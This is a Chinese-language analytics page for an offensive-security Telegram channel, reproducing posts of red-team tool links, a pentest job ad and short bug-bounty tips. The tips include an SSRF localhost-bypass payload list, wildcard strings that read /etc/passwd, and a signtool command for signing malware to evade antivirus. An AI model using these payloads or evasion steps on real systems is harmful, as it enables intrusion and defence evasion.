APT
前往频道在 Telegram
This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat
显示更多📈 Telegram 频道 APT 的分析概览
频道 APT (@apt_notes) 英语 语言赛道中的 是活跃参与者。目前社区聚集了 14 701 名订阅者,在 技术与应用 类别中位列第 8 834,并在 俄罗斯 地区排名第 45 554 位。
📊 受众指标与增长动态
自 невідомо 创建以来,项目保持高速增长,吸引了 14 701 名订阅者。
根据 13 六月, 2026 的最新数据,频道保持稳定运转。过去 30 天订阅人数变化为 414,过去 24 小时变化为 17,整体触达仍然可观。
- 认证状态: 未认证
- 互动率 (ER): 平均受众互动率为 50.76%。内容发布后 24 小时内通常能获得 N/A% 的反应,占订阅者总量。
- 帖子覆盖: 每篇帖子平均可获得 7 449 次浏览,首日通常累积 0 次浏览。
- 互动与反馈: 受众积极参与,单帖平均反应数为 20。
📝 描述与内容策略
作者将该频道定位为表达主观观点的平台:
“This channel discusses:
— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc
Disclaimer:
t.me/APT_Notes/6
Chat Link:
t.me/APT_Notes_PublicChat”
凭借高频更新(最新数据采集于 14 六月, 2026),频道始终保持新鲜度与高覆盖。分析显示受众积极互动,使其成为 技术与应用 类别中的关键影响点。
14 701
订阅者
+1724 小时
+1027 天
+41430 天
帖子存档
14 701
Best SSRF bypass
http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01
#ssrf #bugbounty #bugbountytips14 701
RID Hijacking: Maintaining access on Windows machines
https://r4wsecurity.blogspot.com/2017/12/rid-hijacking-maintaining-access-on.html
https://github.com/r4wd3r/RID-Hijacking
#rid #hijack
14 701
🔥 Antivirus Bypass using EV Code Signing 🔥
Code signing is a method software publishers use to authenticate the programs they distribute to end-users. Basically, a code-signed program tells the end-user and an end-user’s computer that the program being installed/executed is from a legitimate software publisher.
Digitally signed malware can bypass system protection mechanisms that install or launch only programs with valid signatures
You can use the SignTool to sign file with a valid certificate Go Daddy.
For example:
signtool.exe sign /f t.me_secdevoops.pfx /p "*Aspider#" /t http://timestamp.digicert.com .\yourfile
.exe
This allows you to digitally sign PE binaries such as .exe, .cab, .dll, .ocx, .msi, .xpi and .xap files.
Don't forget to share and subscribe
#av #bypass #ev #signing #code14 701
InvisibilityCloak
Proof-of-concept obfuscation toolkit for C# post-exploitation tools. This will perform the below actions for a C# visual studio project.
https://github.com/xforcered/InvisibilityCloak
#obfuscation #av #bypass
14 701
Confluence RCE — CVE-2021-26084
https://github.com/lleavesl/CVE-2021-26084
#confluecne #rce #cve
14 701
#job
About Wallarm
Join an exciting team that enjoys working and playing together. Wallarm is a well-funded technology startup in the San Francisco area. We continue to add new enterprise customers and grow our team. If you are bright, energetic, interested in cutting-edge tech, and want to make a difference in the company’s life, Wallarm is a place for you.
About the role
Are you someone that loves security and is a hacker at heart? Wallarm is looking for an eager and motivated Penetration Tester to join our Audit Security Team. This position will provide you the chance to work on identifying vulnerabilities across different software products and work collaboratively as part of the skilled and experienced pentest team.. If you have experience with penetration testing and a drive to learn check out below to learn more and apply!
What you will do
Develop and execute standard penetration tests to exploit vulnerabilities in the system.
Help ensure software security, communicate security vulnerabilities of all severities to all affected stakeholders within the product organization.
About you
3+ years of relevant experience (or an equivalent combination of education and experience sufficient to successfully perform the principal duties of the job)
Experience with penetration testing
Good critical thinking and problem solving skills
Attention to detail
Knowledge of security principles
Good collaboration skills, applied successfully within team as well as with other areas
Write in comments below, guys will write to you
14 701
Evading EDR with ScareCrow
ScareCrow - Payload creation framework designed around EDR bypass.
https://adamsvoboda.net/evading-edr-with-scarecrow/
https://www.grahamhelton.com/blog/scarecrow/
https://github.com/optiv/ScareCrow
#edr_evasion #shellcode_loader #syscalls
14 701
Thread Stack Spoofing
A PoC implementation for an advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to bypass thread-based memory examination rules and better hide shellcodes while in-process memory.
https://github.com/mgeeky/ThreadStackSpoofer
#stackspoofing #av #evasion #inject #shellcode #bypass #edr
14 701
Blue Team Notes
A collection of one-liners, small scripts, and some useful tips for blue team work.
https://github.com/Purp1eW0lf/Blue-Team-Notes
#blueteam #cheatsheet
14 701
SharpSystemTriggers
Collection of remote authentication triggers in C#
https://github.com/cube0x0/SharpSystemTriggers
#coerce #authentication #petitpotam #spoolsample #dcom
14 701
For someone, who didn't notice this link in our posts
https://j00ru.vexillium.org/syscalls/nt/64/
14 701
LFI Bypass
1) /usr/bin/cat /etc/passwd == /???/???/c?t$IFS/?t?/p?s?wd
2) /*/?at$IFS/???/???swd
3)/****/?at$IFS/???/*swd
4)/****/?at$IFS/???/*******swd
(IFS is Internal Field Separator = [space], [tab] or a [newline])
#bugbounty #bugbountytips #lfi14 701
Using Kerberos for Authentication Relay Attacks
https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html
#kerberos #relay
14 701
C3
Custom Command and Control (C3). A framework for rapid prototyping of custom C2 channels, while still providing integration with existing offensive toolkits.
https://github.com/FSecureLABS/C3
#c2 #cobaltstrike #redteam
14 701
OffensiveVBA
This repo covers some code execution and AV Evasion methods for Macros in Office documents
https://github.com/S3cur3Th1sSh1t/OffensiveVBA
#vba #offensive #maldoc
14 701
Advanced Maldoc Techniques
MS Office File Formats — Advanced Malicious Document (Maldoc) Techniques
# https://medium.com/walmartglobaltech/ms-office-file-formats-advanced-malicious-document-maldoc-techniques-b5f948950fdf
Evasive VBA — Advanced Maldoc Techniques
# https://medium.com/walmartglobaltech/evasive-vba-advanced-maldoc-techniques-1365e9373f80
VBA Stomping — Advanced Maldoc Techniques
# https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278
VBA Project Locked — Project is Unviewable
# https://medium.com/walmartglobaltech/vba-project-locked-project-is-unviewable-4d6a0b2e7cac
#vba #maldoc #advanced
现已上线!2025 年 Telegram 研究 — 年度关键洞察 
